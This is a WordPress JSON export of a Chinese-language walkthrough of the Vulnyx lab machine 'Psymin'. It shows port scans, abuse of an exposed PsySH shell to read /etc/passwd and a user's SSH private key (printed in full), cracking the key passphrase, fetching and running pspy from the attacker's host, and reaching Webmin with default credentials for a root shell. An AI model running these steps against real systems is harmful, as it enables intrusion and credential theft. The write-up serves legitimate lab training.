{"id":799,"date":"2024-09-07T18:09:56","date_gmt":"2024-09-07T10:09:56","guid":{"rendered":"http:\/\/162.14.82.114\/?p=799"},"modified":"2024-09-07T18:10:21","modified_gmt":"2024-09-07T10:10:21","slug":"vulnyx%e3%83%bc%e3%80%83psymin","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/799\/09\/07\/2024\/","title":{"rendered":"Vulnyx(\u00b0\u30fc\u00b0\u3003)Psymin"},"content":{"rendered":"

(\u00b0\u30fc\u00b0\u3003)Psymin<\/h2>\n

\"image-20240907164217493\"<\/div>
\n
\"image-20240907172727198\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\nOpen 192.168.10.100:3000\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\n| ssh-hostkey: \n|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzUvGOaZF4gJoYBGR4NrMZOj32x98uVDUQ0dY0RENRdIyokD8RvJG8g9g71aoh\/20m4mcEEdSyp+eE9ABu1kwk=\n|   256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrNZ9AQg+cgX4w0wabsDTAVeo9\/VWThsF5efc2OzsFo\n80\/tcp   open  http    syn-ack nginx 1.22.1\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\n|_http-title: Welcome to nginx!\n3000\/tcp open  ppp?    syn-ack\n| fingerprint-strings: \n|   DNSStatusRequestTCP: \n|     ^@^L^@^@^P^@^@^@^@^@^@^@^@^@Psy Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|     OPTIONS \/ RTSP\/1.0\n|   DNSVersionBindReqTCP: \n|     ^CPsy Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|   GenericLines, NULL: \n|     Psy Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|   GetRequest: \n|     GET \/ HTTP\/1.0\n|     Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|     HTTP\/1.0\n|     Error Undefined constant "GET".\n|   HTTPOptions: \n|     OPTIONS \/ HTTP\/1.0\n|     Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|     OPTIONS \/ HTTP\/1.0\n|     Error Undefined constant "OPTIONS".\n|   Help: \n|     HELP\n|     Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|     HELP\n|     Error Undefined constant "HELP".\n|   NCP: \n|     DmdT^@^@^@\n|     ^@^@^@^A^@^@^@^@\n|   RTSPRequest: \n|     OPTIONS \/ RTSP\/1.0\n|     Shell v0.12.4 (PHP 8.2.20 \n|     cli) by Justin Hileman\n|     OPTIONS \/ RTSP\/1.0\n|     Error Undefined constant "OPTIONS".\n|   SSLSessionReq: \n|     ^C^A^@Psy Shell v0.12.4 (PHP 8.2.20 \n|_    cli) by Justin Hileman\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%I=7%D=9\/7%Time=66DC1CBF%P=x86_64-pc-linux-gnu%r(\nSF:NULL,3C,"Psy\\x20Shell\\x20v0\\.12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\nSF:\\x20cli\\)\\x20by\\x20Justin\\x20Hileman\\r\\n>\\x20")%r(GenericLines,4C,"Psy\\\nSF:x20Shell\\x20v0\\.12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x20\nSF:by\\x20Justin\\x20Hileman\\r\\n>\\x20\\r\\n>\\x20\\r\\n>\\x20\\r\\n>\\x20\\r\\n>\\x20")%\nSF:r(GetRequest,99,"GET\\x20\/\\x20HTTP\/1\\.0\\r\\n\\r\\n\\r\\n\\r\\nPsy\\x20Shell\\x20v\nSF:0\\.12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x20by\\x20Justin\\\nSF:x20Hileman\\r\\n>\\x20GET\\x20\/\\x20HTTP\/1\\.0\\r\\n\\r\\n\\x20\\x20\\x20Error\\x20\\x\nSF:20Undefined\\x20constant\\x20\\"GET\\"\\.\\r\\n\\r\\n>\\x20\\r\\n>\\x20\\r\\n>\\x20\\r\\n\nSF:>\\x20")%r(Help,7A,"HELP\\r\\n\\r\\nPsy\\x20Shell\\x20v0\\.12\\.4\\x20\\(PHP\\x208\\\nSF:.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x20by\\x20Justin\\x20Hileman\\r\\n>\\x20HELP\nSF:\\r\\n\\r\\n\\x20\\x20\\x20Error\\x20\\x20Undefined\\x20constant\\x20\\"HELP\\"\\.\\r\\\nSF:n\\r\\n>\\x20\\r\\n>\\x20")%r(NCP,38,"DmdT\\^@\\^@\\^@\\x08\\x20\\x08\\x08\\x20\\x08\\x\nSF:08\\x20\\x08\\x08\\x20\\x08\\x08\\x20\\x08\\x08\\x20\\x08\\x08\\x20\\x08\\x08\\x20\\x08\\\nSF:x08\\x20\\x08\\x08\\x20\\x08\\^@\\^@\\^@\\^A\\^@\\^@\\^@\\^@")%r(HTTPOptions,A5,"OPT\nSF:IONS\\x20\/\\x20HTTP\/1\\.0\\r\\n\\r\\n\\r\\n\\r\\nPsy\\x20Shell\\x20v0\\.12\\.4\\x20\\(PH\nSF:P\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x20by\\x20Justin\\x20Hileman\\r\\n>\\\nSF:x20OPTIONS\\x20\/\\x20HTTP\/1\\.0\\r\\n\\r\\n\\x20\\x20\\x20Error\\x20\\x20Undefined\\\nSF:x20constant\\x20\\"OPTIONS\\"\\.\\r\\n\\r\\n>\\x20\\r\\n>\\x20\\r\\n>\\x20\\r\\n>\\x20")%\nSF:r(RTSPRequest,A5,"OPTIONS\\x20\/\\x20RTSP\/1\\.0\\r\\n\\r\\n\\r\\n\\r\\nPsy\\x20Shell\nSF:\\x20v0\\.12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x20by\\x20Ju\nSF:stin\\x20Hileman\\r\\n>\\x20OPTIONS\\x20\/\\x20RTSP\/1\\.0\\r\\n\\r\\n\\x20\\x20\\x20Er\nSF:ror\\x20\\x20Undefined\\x20constant\\x20\\"OPTIONS\\"\\.\\r\\n\\r\\n>\\x20\\r\\n>\\x20\nSF:\\r\\n>\\x20\\r\\n>\\x20")%r(DNSVersionBindReqTCP,3E,"\\^CPsy\\x20Shell\\x20v0\\.\nSF:12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x20by\\x20Justin\\x20\nSF:Hileman\\r\\n>\\x20")%r(DNSStatusRequestTCP,74,"\\^@\\^L\\^@\\^@\\^P\\^@\\^@\\^@\\^\nSF:@\\^@\\^@\\^@\\^@\\^@Psy\\x20Shell\\x20v0\\.12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\\nSF:x80\\x94\\x20cli\\)\\x20by\\x20Justin\\x20Hileman\\r\\n>\\x20\\^L\\x07\\r>\\x20OPTIO\nSF:NS\\x20\/\\x20RTSP\/1\\.0\\x07\\x07\\x07\\x07")%r(SSLSessionReq,42,"\\^C\\^A\\^@Psy\nSF:\\x20Shell\\x20v0\\.12\\.4\\x20\\(PHP\\x208\\.2\\.20\\x20\\xe2\\x80\\x94\\x20cli\\)\\x2\nSF:0by\\x20Justin\\x20Hileman\\r\\n>\\x20");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.100\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 96152 \/ 441122 (21.80%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 96440 \/ 441122 (21.86%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240907173123267\"<\/div><\/p>\n
\u654f\u611f\u7aef\u53e3\u6d4b\u8bd5<\/h3>\n
\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b3000\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\uff1ahttps:\/\/github.com\/bobthecow\/psysh\/wiki\/Commands<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ nc $IP 3000\nPsy Shell v0.12.4 (PHP 8.2.20 \u2014 cli) by Justin Hileman\n> $a = $b = 'c'                                   \n$a = $b = 'c'\nWARNING: terminal is not fully functional\nPress RETURN to continue \n\n= "c"\n\n> ls -la\nls -la\nWARNING: terminal is not fully functional\nPress RETURN to continue \n\nVariables:\n  $a   "c"  \n  $b   "c"  \n  $_   "c"<\/code><\/pre>\n
\u5c1d\u8bd5\u6267\u884c\u76f8\u5173\u547d\u4ee4\uff0c\u8bfb\u53d6\u6587\u4ef6\uff1a<\/p>\n
> echo file_get_contents("\/etc\/passwd")\necho file_get_contents("\/etc\/passwd")\nWARNING: terminal is not fully functional\nPress RETURN to continue \n\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\nalfred:x:1000:1000:alfred:\/home\/alfred:\/bin\/bash<\/code><\/pre>\n
\u5229\u7528\u79c1\u94a5\u767b\u5f55<\/h3>\n
\u5c1d\u8bd5\u8bfb\u53d6ssh\u7684\u79c1\u94a5\uff1a<\/p>\n
> echo file_get_contents("\/home\/alfred\/.ssh\/id_rsa")\necho file_get_contents("\/home\/alfred\/.ssh\/id_rsa")\nWARNING: terminal is not fully functional\nPress RETURN to continue \n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBWOeeCO8\nNm4oY6rWFVJWGSAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQDmBGltoOo9\n2+1IhampZ7uruuyNBZo\/okfSrRZldZa6ONTd+g7Ew38mV2LFaYvhhCljv72UMoH1uw6uUd\nAjx0elKmSnmmkl4iWb0yLVqpJfbvC\/jQsMLhpbmroib2CAItp4OJjsO\/oXSsYjs+EFFG8U\nJrC1msLVq1IvyX4Xko7RRSbfnszss2Uooxv3zLWkE42ZaybVOGcpLVmaYKfmhc7MimwvEF\noXlZYIEF12OCqDymi3zTIlEIs+u1bSiUe1qPrUYZBQa3uaao3c5NLlQUo6VlBmz0ChOIlS\nrJLULxLj4S0NU6yHSYH9L1rTzgjdFctRGNkbZj01uPsFKUq7+3Le2ra3fnATY3XL8TVdvi\njRFHHk6HGQjnwcxsff5yuCZViY12AkcLnwwSG\/+d3moXTqHWqExRIzAwbqkGYoazC792Hh\nfTKqkHlOmqITZ2oq2Y6REs\/WTsRnWMreWKdI4Xu2dmR+0R7gipFt7NVM8TxevkC0RMy9WR\nJOyeEmzlQs7ycAAAWA5dCTI3t\/96BLDOuSABD3E4L2xEyvpmASvmEb4G81w+PrdpbjrHrI\n+q5pCDMou60AtwxQ4\/nArorHDAmAFh4RKFf4hSwLuF0v2I\/+oM8zu8INBFU6o\/zm+xaXrJ\ni7pxzwXmgtaP+kCI5oDUPBjSExYB+whCfZmwWyLB64hzO1\/CQ+cJJHYmD+Q6qq3anaJ6fn\npKKoLfhnzpIynxalKot2rzlEtAD7DYLPQdErofRTK14tWNNoDe7J++cfRPpOb\/SkajL5hy\njNTMEaLjXeXV5Lkjo5D8aoNV1D88vltmzbQAMUdINw3qCjdHRGKLrnIxk311cQRsAnkORR\n+G1q\/hlazo5auw4NRXqhle84Wef6w2zlc4jVThB7nB3N\/Z8iR0OpypjVd4mqCwhSx+EGxD\n\/ANW6uMo+KBnjwIGRQCY15pPXyWbXuI9YW2PVIM2ftVgGdWD8y2HU1aIOxtod3gg0ScgGs\nGE3F3rV2cyRFA+328C5ZTgZvc7hMDyk815Iu4Tsp+MetOcnav084G9wgKJFyrO\/q3dnwdN\nN1gBaH75cXrCcNRsC6D1b7WGgk+FrdSQSmVi0HIuTNOi1DBu5Ca1Y1IJYN2x1tnY2u+xVo\nI7T1Hllv8GprZ+pjdHZvycGQsFRQGx\/9YGf4hzzghmLbtO+PP60SxPyxkNUAcDrUNFpzNk\ncs\/nsxdi+uprwxqLmWHKHlYrQvUFyT4CpS9DhXp64tRCqpeQSQNxobqKXttfNABkvzbJI0\nbKqMjH\/MvSoTCVhVuSBrfjoIJHsBDdMkA9TZJvlO90eKnd2Q3cFUtKxRxJ2LUN7L2AKcpL\n1a7x7Hz7smRcBnBN7kbdncspicg3T8SohR0+89yc1EXyc2XilxkOA8b8Mva\/UkdOJ9C4j1\nzNZnADoCOqYB4jqUhtt3Dkx4FH8zsjRyZAs\/h+0TvO3Yi6LGRq8bmTNAILJULJugWXBCf+\nD5AUPY5avUqlWSoz6KK6ZrReXp364s8+9v35atZgAAe1id+U2zPknKM8VfSuZA388m4EVe\nBaHOAmuErjvebwX+iNSMXtJUj7HzIrxxFWmz5QH9b+xJmz9UE9xtb6eSyP0lYrTi\/mPTbF\nd11vPj0CQFY9erN\/PXj5L8GmJQ+P7t8ylNcxQbgm4udiaAawjsvfLHJzIQLp5O88S45lP3\nU7\/ybJgIlJTzfM4gGhZU5bImxq1M2AA1vR235jQYOoX11MavwJyRn3J8VULohxwZ5mmcDf\nXJ8z\/h63AEoqpoyCiQketbqos+520EPFkXM402MfOfeF0kJ5HvyGLzpHg7mAFpjjFt+DYR\nhjFAGa22yzXqtNMf4shvNkVDYRw9ovr1K2RC7I974qsQKJkigM4bBaLy3GFuaz5bPl+9dW\nbZLWamr3VEngkdxPP81Gqq7G5A2dWlmTWpw8gRoMK2iTE5RURi\/LjeKtTOpp\/yDYiQZ+r8\nZgSeJIWvHV0fRFT+F53cjpfw440BJ0AoO1O0uS\/P1TwYnVxHVYAac660lSt0Ap3z0OjQ+d\ne5XDwoX3mRVfgZJNkdiSlpJdv8s+9gbnGwh4My2uCEf4ClDNNWjGaaH4GBM1DmTvXIW7jE\n9Ip7KZt9a1mPkATlfDzAcx3BctGL5FiWjh0xKBm7zEfxQYJ+BQTMJx+H7r8r7+N\/2BXrOl\nkKZFXuxhA2vSCGmg\/X0wMhho2hXVZa71MzgVecrXEcDAxaygl6zhFYHHUqTakH+g9cjvTF\nMogNcrzTD2EbYnPGeFW2Dw3ou3UQrw8IVfCMw80wBnpBduzfB9R\/wPHEo\/SB5\/XXD4bvtq\ni7r\/\/mh3eIKOui6k\/uenK62BD+u6IlDOlNela03N6Ix7ZbnqECHHzNPKeFpb6uh8sqPIPD\nmqXDfQ==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u5229\u7528\u79c1\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ vim alfred\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ chmod 600 alfred \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ ssh -i alfred alfred@$IP       \nThe authenticity of host '192.168.10.100 (192.168.10.100)' can't be established.\nED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i\/dOR4+6rQZf20TIk\/U.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.10.100' (ED25519) to the list of known hosts.\nEnter passphrase for key 'alfred':<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ ssh2john alfred > hash                                                                              \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash     \nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashes\nCost 2 (iteration count) is 16 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nalfredo          (alfred)     \n1g 0:00:00:58 DONE (2024-09-07 05:43) 0.01698g\/s 15.21p\/s 15.21c\/s 15.21C\/s molly..ilovegod\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\"image-20240907174410961\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
alfred@psymin:~$ sudo -l\n-bash: sudo: orden no encontrada\nalfred@psymin:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\nalfred@psymin:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\nalfred@psymin:~$ ss -tulnp\nNetid           State            Recv-Q           Send-Q                     Local Address:Port                        Peer Address:Port           Process                                   \nudp             UNCONN           0                0                                0.0.0.0:68                               0.0.0.0:*                                                        \nudp             UNCONN           0                0                                0.0.0.0:10000                            0.0.0.0:*                                                        \ntcp             LISTEN           0                128                              0.0.0.0:22                               0.0.0.0:*                                                        \ntcp             LISTEN           0                511                              0.0.0.0:80                               0.0.0.0:*                                                        \ntcp             LISTEN           0                5                                0.0.0.0:3000                             0.0.0.0:*               users:(("socat",pid=466,fd=5))           \ntcp             LISTEN           0                4096                           127.0.0.1:10000                            0.0.0.0:*                                                        \ntcp             LISTEN           0                128                                 [::]:22                                  [::]:*                                                        \ntcp             LISTEN           0                511                                 [::]:80                                  [::]:*            \nalfred@psymin:~$ curl 0.0.0.0 1000\n<!DOCTYPE html>\n<html>\n<head>\n<title>Welcome to nginx!<\/title>\n<style>\nhtml { color-scheme: light dark; }\nbody { width: 35em; margin: 0 auto;\nfont-family: Tahoma, Verdana, Arial, sans-serif; }\n<\/style>\n<\/head>\n<body>\n<h1>Welcome to nginx!<\/h1>\n<p>If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.<\/p>\n\n<p>For online documentation and support please refer to\n<a href="http:\/\/nginx.org\/">nginx.org<\/a>.<br\/>\nCommercial support is available at\n<a href="http:\/\/nginx.com\/">nginx.com<\/a>.<\/p>\n\n<p><em>Thank you for using nginx.<\/em><\/p>\n<\/body>\n<\/html><\/code><\/pre>\n
\u5c1d\u8bd5\u4e0a\u4f20pspy64<\/code>\u8fdb\u884c\u76d1\u542c\uff1a<\/p>\n
alfred@psymin:~$ cd \/tmp\nalfred@psymin:\/tmp$ wget http:\/\/192.168.10.102:8888\/lpspy64\nalfred@psymin:\/tmp$ chmod +x lpspy64 \nalfred@psymin:\/tmp$ .\/lpspy64<\/code><\/pre>\n
\"image-20240907175116755\"<\/div>
\n
\"image-20240907175127477\"<\/div><\/p>\n
\u53d1\u73b0root\u5728\u6267\u884c\u67d0\u4e2a\u8fdb\u7a0b\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
alfred@psymin:\/tmp$ cat \/usr\/share\/webmin\/webmincron\/webmincron.pl\n#!\/usr\/bin\/perl\n# Wrapper to run a single function via webmin cron\n\n$main::no_acl_check = 1;\n$main::no_referers_check = 1;\n$main::webmin_script_type = 'cron';\ndo '.\/webmincron-lib.pl';\n$cron = $ARGV[0];\n\n# Build list of args\nmy @args;\nfor(my $i=0; defined($cron->{'arg'.$i}); $i++) {\n        push(@args, $cron->{'arg'.$i});\n        }\n\n# Force webmin script type to be cron\n$main::webmin_script_type = 'cron';\n$main::webmin_script_webmincron = $cron->{'module'}."::".$cron->{'func'};\n\n# Require the module, call the function\neval {\n        local $main::error_must_die = 1;\n        &foreign_require($cron->{'module'}, $cron->{'file'});\n        &foreign_call($cron->{'module'}, $cron->{'func'}, @args);\n        };\n$log = { %$cron };\nif ($@) {\n        $log->{'error'} = $@;\n        }\n\n# Log it, if enabled\nif ($gconfig{'logsched'}) {\n        &webmin_log("run", "webmincron", $cron->{'id'}, $log);\n        }<\/code><\/pre>\n
\u8fdb\u4e00\u6b65\u67e5\u770b\uff1a<\/p>\n
alfred@psymin:\/tmp$ find \/ -name webmin 2>\/dev\/null\n\/etc\/webmin\n\/etc\/webmin\/webmin\n\/etc\/pam.d\/webmin\n\/usr\/bin\/webmin\n\/usr\/share\/webmin\n\/usr\/share\/webmin\/webmin\n\/usr\/share\/webmin\/bin\/webmin\n\/usr\/share\/webmin\/gray-theme\/webmin\n\/usr\/share\/webmin\/gray-theme\/images\/favicons\/webmin\n\/usr\/share\/webmin\/authentic-theme\/images\/modules\/webmin\n\/usr\/share\/webmin\/authentic-theme\/images\/favicons\/webmin\n\/usr\/share\/doc\/webmin\n\/var\/webmin<\/code><\/pre>\n
\u5f31\u5bc6\u7801\u767b\u5f55<\/h3>\n
\"image-20240907175811045\"<\/div><\/p>\n
\u5c1d\u8bd5\u8f6c\u53d110000\u7aef\u53e3\uff1a<\/p>\n
alfred@psymin:~$ socat TCP-LISTEN:10001,fork TCP4:127.0.0.1:10000&\n[1] 1702<\/code><\/pre>\n
\"image-20240907180328848\"<\/div><\/p>\n
\u5c1d\u8bd5\u9ed8\u8ba4\u7528\u6237\u5bc6\u7801\uff1a<\/p>\n
\"image-20240907180605845\"<\/div>
\n
\"image-20240907180615085\"<\/div>
\n
\"image-20240907180634589\"<\/div><\/p>\n
\u767b\u5f55\u6210\u529f\uff0c\u5c1d\u8bd5\u6267\u884c\u76f8\u5173\u547d\u4ee4\uff01<\/p>\n
\"image-20240907180726055\"<\/div><\/p>\n
\u628ashell\u5f39\u56de\u6765\uff1a<\/p>\n
\"image-20240907180828979\"<\/div>
\n
\"image-20240907180842454\"<\/div><\/p>\n
\u6210\u529f\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
(\u00b0\u30fc\u00b0\u3003)Psymin \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Psymin] \u2514 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-799","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/799","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=799"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/799\/revisions"}],"predecessor-version":[{"id":801,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/799\/revisions\/801"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=799"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=799"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=799"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}